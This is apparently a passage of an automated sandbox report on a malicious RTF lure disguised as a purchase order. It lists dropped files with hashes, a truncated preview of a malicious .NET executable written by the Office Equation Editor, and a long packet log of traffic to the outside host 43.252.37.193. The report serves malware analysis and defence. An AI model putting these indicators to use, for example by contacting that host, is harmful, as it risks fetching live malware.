Category:	dropped
Size (bytes):	2198
Entropy (8bit):	4.569121824697969
Encrypted:	false
SSDEEP:	48:8RT/XTFGqeFluFQKQh2RT/XTFGqeFluFQKQ/:8RT/XJGqMaQKQh2RT/XJGqMaQKQ/
MD5:	91095A9FFC9D48E66067CA79DDAC8523
SHA1:	8A25628BBEF0338F607DD1734B8EFD0C47CAF5C6
SHA-256:	3152D3CC672A8ECE8A610A25A090438C57CB945A2EC56A49C2618320E96158E1
SHA-512:	69A9A2D6517B33E55432049BB9C4CB0ACA014FCF6E97EE315F3CE760475BB14A9C390218D2FD056244DFFCAD25FE3A2AF93A067E5F7B5E35DBD4DAA1618311F5
Malicious:	false
Preview:	L..................F.... ...~/...{..~/...{.../..H...[............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.[...HRt. .REVISE~1.DOC..l.......Q.y.Q.y...8.....................R.e.v.i.s.e.d. .P.u.r.c.h.a.s.e. .O.r.d.e.r. .1.2.1.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\Revised Purchase Order 1214.doc.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .P.u.r.c.h.a.s.e. .O.r.d.e.r. .1.2.1.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.609062540608823
Encrypted:	false
SSDEEP:	3:M1mQz94qCd5ovDz94qCd5omX1mQz94qCd5ov:M5CRkHCRfCRy
MD5:	C89A709DE8831715DB5E7567BC4AA5DD
SHA1:	FF47F40260EACB410ABEA621A133FF063ECE0056
SHA-256:	6D18B7E48FAB0DBE4AAFF0F945C3C1F9A034CB5A3FE6B241CF0A47976FB2F77D
SHA-512:	1D4F56A6BD0CB1AC08719118D12467BFFA687686B36A9190EBD80AA3D282A8C9B77BA9E420743A72B09ECAC70DD8BAC2B76B5CD80F4E39AF7610D7DE636709DA
Malicious:	false
Preview:	[doc]..Revised Purchase Order 1214.LNK=0..Revised Purchase Order 1214.LNK=0..[doc]..Revised Purchase Order 1214.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734720
Entropy (8bit):	7.6904916579877
Encrypted:	false
SSDEEP:	12288:/ytZi970Oz6hGyBh7WVQlW9QWwJnKSr9Iz5JpqbvsKcDDgqnpLTm:/gZ7BhaVQlW9QWwpnr9IzHsTWgcpLTm
MD5:	CEDD3570A65CE74199167DA6E5190CC4
SHA1:	A3BB3123551BEF96ADCDC4487E1D2B32752D65F7
SHA-256:	5158FFB1CEECEC8B07B14DC463CC8356283A006443A0D6201D91222AC52BAE03
SHA-512:	9C1C4C290AD5611B480119EFB81244F889370AC4F36380EBDA64058FB19F2424CDE1B9DB1F3339BDE330B8897CE1179D7EE1415DAC129D6A52671E9D65636824
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... `................. ..........>>... ........@.. ....................................@..................................=..W....@.......................`....................................................... ............... ..H............text...D.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......4..............@..B................ >......H........$..\...........(...`C...........................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\Desktop\~$vised Purchase Order 1214.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.00954560931993
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Revised Purchase Order 1214.doc
File size:	234075
MD5:	4b6b36751c6b94190a4ffd8cf8859758
SHA1:	b1771187bcd8c9dc333b90131acd3a71e315c111
SHA256:	ea6269300a84f6764e771f3c560da1a639272149302d51a1e31bbee034691944
SHA512:	d5ec5702fb0ec57e5c0d9dec6906d6c3f147169f94f0e431c767444d64a356777350c1ace3a97addb73f89feae61b9bf64a1d3b9d32ee3538d93041fdc5566af
SSDEEP:	6144:ISPr3uZ/at5IWhizLKnsBSgLStnIfW0hRFE3rSeixfgbQy:7r3c/e5IWhi/KsMySlIfDFE3me+/y
File Content Preview:	{\rtf9620{\object256852 256852\objlink\objw6336\objh1549{\\objdata919862 {\\mcGpRule380022238.380022238\\.380022238 \\mcGpRule380022238.380022238\*

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000005Fh								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2021 10:28:18.433629036 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.638010025 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.638117075 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.638580084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.845052958 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852696896 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852761984 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852811098 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852861881 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852900028 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852940083 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852946997 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.852978945 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.852986097 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.852988958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.853018045 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.853032112 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.853060007 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:18.853091002 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:18.853125095 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057574987 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057729959 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057781935 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057826996 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057846069 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057864904 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057878971 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057903051 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057905912 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057924032 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057940960 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057945967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.057982922 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.057982922 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058018923 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058022976 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058060884 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058094025 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058108091 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058151007 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058151960 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058156967 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058188915 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058191061 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058228016 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058231115 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058264971 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058267117 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058303118 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058305979 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.058340073 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.058377028 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.264429092 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264573097 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264630079 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264674902 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264713049 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264719963 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.264751911 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.264756918 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.264794111 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.264827967 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.265043020 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.265094042 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.265120029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.265137911 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.265151024 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.265188932 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.269750118 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469351053 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469439030 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469446898 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469489098 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469506025 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469516993 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469526052 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469546080 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469557047 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469574928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469588041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469614029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469641924 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469645977 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469659090 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469675064 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469696045 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469719887 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.469907999 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.469938040 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.470000029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.470325947 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.470423937 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.474119902 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.474194050 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.674268961 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674325943 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674359083 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674396992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674446106 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674489021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674529076 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674568892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674608946 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674648046 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.674676895 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.674740076 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.674756050 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.674762964 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.674767017 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.675775051 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.675818920 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.675883055 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.676018000 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879314899 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879396915 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879455090 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879494905 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879533052 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879581928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879620075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879641056 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879671097 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879682064 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879688025 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879692078 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879697084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879700899 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879705906 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879715919 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879748106 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879756927 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879791975 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879796028 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879815102 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879834890 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.879923105 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.879940033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.880942106 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:19.881035089 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:19.882529974 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084197998 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084325075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084376097 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084419012 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084456921 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084496021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084536076 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084557056 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084577084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084594011 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084597111 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084647894 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.084650993 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084673882 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.084738970 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.086823940 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.086972952 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289125919 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289164066 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289202929 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289237022 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289271116 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289305925 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289308071 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289343119 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289343119 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289350033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289355040 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289359093 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289372921 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.289412975 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.289479971 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.291296005 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.291362047 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.291384935 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.493985891 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.494045973 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.494096994 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.494143963 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.494282007 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.494333029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.494725943 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.495641947 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.495704889 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.495778084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.495827913 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.698791027 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.698843956 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.698882103 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.698921919 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.698961020 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.699079037 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.699143887 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.699156046 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.699162006 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.699166059 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.700084925 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.700129032 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.700217009 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.700237036 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.903728962 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.903775930 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.903822899 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.904043913 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.904613018 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.904655933 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:20.904704094 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:20.904728889 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.108608007 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.108659029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.108696938 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.108746052 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.108922005 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.108974934 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.109050989 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.109093904 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.109133959 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.109160900 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.313561916 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.313628912 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.313673019 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.313710928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.313749075 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.313950062 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.316771984 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.316790104 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.518392086 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.518438101 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.518488884 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.518640995 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.518693924 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.518701077 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.520978928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.521015882 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.521148920 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.521198988 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.724520922 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.725131035 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.727204084 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.727282047 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.727391958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.727416039 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.929595947 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.929699898 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.931683064 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.931735992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:21.931777954 CET	80	49167	43.252.37.193	192.168.2.22
